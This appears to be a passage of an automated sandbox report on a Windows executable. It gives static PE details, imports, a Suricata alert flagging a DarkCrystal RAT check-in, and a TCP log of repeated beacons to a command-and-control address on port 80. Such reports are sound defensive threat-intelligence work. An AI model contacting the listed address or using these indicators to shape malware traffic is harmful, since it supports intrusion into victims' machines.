                                                        SSDEEP:24576:2TbBv5rUyXVS/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7/:IBJSiydNfyADTXWNoCp73MPPZp7Vl
                                                        TLSH:E5B5BF0695D24E77C2A097318457143E5294EA327972EF1B764F10A6AC13BF1CBB32BB
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                        File Icon

                                                        Icon Hash:1515d4d4442f2d2d

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x41f530
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                        Entrypoint Preview

                                                        Instruction
                                                        call 00007FC60489F78Bh
                                                        jmp 00007FC60489F09Dh
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        push dword ptr [ebp+08h]
                                                        mov esi, ecx
                                                        call 00007FC604891EE7h
                                                        mov dword ptr [esi], 004356D0h
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        and dword ptr [ecx+04h], 00000000h
                                                        mov eax, ecx
                                                        and dword ptr [ecx+08h], 00000000h
                                                        mov dword ptr [ecx+04h], 004356D8h
                                                        mov dword ptr [ecx], 004356D0h
                                                        ret
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        mov esi, ecx
                                                        lea eax, dword ptr [esi+04h]
                                                        mov dword ptr [esi], 004356B8h
                                                        push eax
                                                        call 00007FC6048A252Fh
                                                        test byte ptr [ebp+08h], 00000001h
                                                        pop ecx
                                                        je 00007FC60489F22Ch
                                                        push 0000000Ch
                                                        push esi
                                                        call 00007FC60489E7E9h
                                                        pop ecx
                                                        pop ecx
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        push ebp
                                                        mov ebp, esp
                                                        sub esp, 0Ch
                                                        lea ecx, dword ptr [ebp-0Ch]
                                                        call 00007FC604891E62h
                                                        push 0043BEF0h
                                                        lea eax, dword ptr [ebp-0Ch]
                                                        push eax
                                                        call 00007FC6048A1FE9h
                                                        int3
                                                        push ebp
                                                        mov ebp, esp
                                                        sub esp, 0Ch
                                                        lea ecx, dword ptr [ebp-0Ch]
                                                        call 00007FC60489F1A8h
                                                        push 0043C0F4h
                                                        lea eax, dword ptr [ebp-0Ch]
                                                        push eax
                                                        call 00007FC6048A1FCCh
                                                        int3
                                                        jmp 00007FC6048A3A67h
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push 00422900h
                                                        push dword ptr fs:[00000000h]

                                                        Rich Headers

                                                        Programming Language:
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                        PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                        RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                        RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                        RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                        RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                        RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                        RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                        RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                        RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                        RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                        RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                        RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                        RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                        RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                        RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                        RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                        RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                        RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                        RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                        RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                        RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                        RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                        RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                        RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                        RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                        RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                        Imports

                                                        DLLImport
                                                        KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                        OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                        gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                        2024-08-31T09:32:13.286244+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14973280192.168.2.480.211.144.156

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Aug 31, 2024 09:32:12.568890095 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:12.573697090 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:12.575596094 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:12.576457977 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:12.581198931 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:12.927773952 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:12.932559967 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.239546061 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.286243916 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:13.331662893 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.331677914 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.331727982 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:13.369049072 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:13.376590967 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.499406099 CEST4973580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:13.504292011 CEST804973580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.504399061 CEST4973580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:13.504538059 CEST4973580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:13.509294033 CEST804973580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.573038101 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.573350906 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:13.578149080 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.849100113 CEST4973580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:13.854063034 CEST804973580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.854073048 CEST804973580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.854089022 CEST804973580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.867084026 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:13.889965057 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:13.894877911 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.094197989 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.094379902 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:14.099231958 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.099313974 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.189268112 CEST804973580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.239646912 CEST4973580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:14.327739954 CEST804973580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.380258083 CEST4973580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:14.388472080 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.442778111 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:14.460016012 CEST4973780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:14.461307049 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:14.461421967 CEST4973580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:14.464879990 CEST804973780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.464998007 CEST4973780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:14.465145111 CEST4973780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:14.466547966 CEST804973280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.466727018 CEST4973280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:14.466773987 CEST804973580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.466995001 CEST4973580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:14.469890118 CEST804973780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.817850113 CEST4973780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:14.822859049 CEST804973780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.822868109 CEST804973780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:14.822875977 CEST804973780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:15.130662918 CEST804973780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:15.177176952 CEST4973780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:15.259851933 CEST804973780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:15.261245012 CEST4973780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:15.266406059 CEST804973780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:15.266582966 CEST4973780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:15.380101919 CEST4973980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:15.384967089 CEST804973980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:15.385047913 CEST4973980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:15.385185003 CEST4973980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:15.389918089 CEST804973980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:15.739810944 CEST4973980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:15.744699001 CEST804973980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:15.744712114 CEST804973980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:15.744720936 CEST804973980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:16.069808006 CEST804973980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:16.114646912 CEST4973980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:16.204001904 CEST804973980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:16.255268097 CEST4973980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:16.333818913 CEST4973980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:16.335203886 CEST4974080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:16.339207888 CEST804973980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:16.339258909 CEST4973980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:16.340004921 CEST804974080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:16.340059996 CEST4974080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:16.340157986 CEST4974080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:16.344934940 CEST804974080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:16.692857981 CEST4974080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:16.697871923 CEST804974080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:16.697884083 CEST804974080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:16.697890997 CEST804974080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:17.021792889 CEST804974080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:17.067816019 CEST4974080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:17.212992907 CEST804974080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:17.255295038 CEST4974080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:17.332170963 CEST4974080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:17.333010912 CEST4974180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:17.337321997 CEST804974080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:17.338130951 CEST804974180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:17.338224888 CEST4974080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:17.338247061 CEST4974180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:17.341413021 CEST4974180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:17.346247911 CEST804974180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:17.693007946 CEST4974180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:17.697933912 CEST804974180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:17.697945118 CEST804974180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:17.697952032 CEST804974180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.026305914 CEST804974180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.067775011 CEST4974180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:18.159992933 CEST804974180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.208403111 CEST4974180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:18.286592960 CEST4974180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:18.287884951 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:18.292026043 CEST804974180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.292081118 CEST4974180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:18.292625904 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.292691946 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:18.292800903 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:18.297528982 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.645994902 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:18.650938034 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.650953054 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.650960922 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.978549957 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.020898104 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.109905005 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.161520004 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.241640091 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.242639065 CEST4974380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.247040987 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.247088909 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.247430086 CEST804974380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.247488022 CEST4974380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.247610092 CEST4974380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.252341032 CEST804974380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.396853924 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.402965069 CEST4974380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.403347969 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.403486013 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.403630018 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.410731077 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.453237057 CEST804974380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.532488108 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.537293911 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.537378073 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.537461042 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.542246103 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.712869883 CEST804974380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.712937117 CEST4974380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.755436897 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.760318995 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.760385990 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.895970106 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.900971889 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.900981903 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.900989056 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.070568085 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.114686966 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.225775957 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.270908117 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.275399923 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.317775965 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.422074080 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.474010944 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.549632072 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.549637079 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.550493956 CEST4974680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.554970026 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.555033922 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.555161953 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.555212975 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.555557966 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.555624962 CEST4974680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.555720091 CEST4974680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.560529947 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.911768913 CEST4974680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.916698933 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.916712046 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.916721106 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.220643044 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.270895958 CEST4974680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:21.348033905 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.395935059 CEST4974680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:21.491704941 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:21.496522903 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.497648954 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:21.497766018 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:21.502593040 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.849148989 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:21.856080055 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.856092930 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.856200933 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:22.181421041 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:22.224118948 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:22.315757036 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:22.364784002 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:22.440026045 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:22.440772057 CEST4974880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:22.445174932 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:22.445235014 CEST4974780192.168.2.480.211.144.156
